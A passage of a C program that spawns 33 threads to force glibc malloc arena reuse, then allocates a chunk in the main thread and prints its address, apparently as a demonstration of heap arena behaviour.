    pthread_t tid[40];
    int i;
    char *a;
    num = 0;
    setvbuf(stdin, 0LL, 2, 0LL);
    setvbuf(stdout, 0LL, 2, 0LL);
    printf("this is a test for thread arena! %d\n", num);

    /* 64-bit arena limit is 8 * cores (plus main_arena), so 33 threads on a
       typical box force arena reuse */
    for (i = 0; i < 33; i++) {
        pthread_create(&tid[i], NULL, thread_func, NULL);
    }
    a = malloc(0x80);
    printf("[*] main malloc address %p\n", a);
    for (i = 0; i < 33; i++) {
        pthread_join(tid[i], 0);
    }
    sleep(10);
    return 0;
}
```
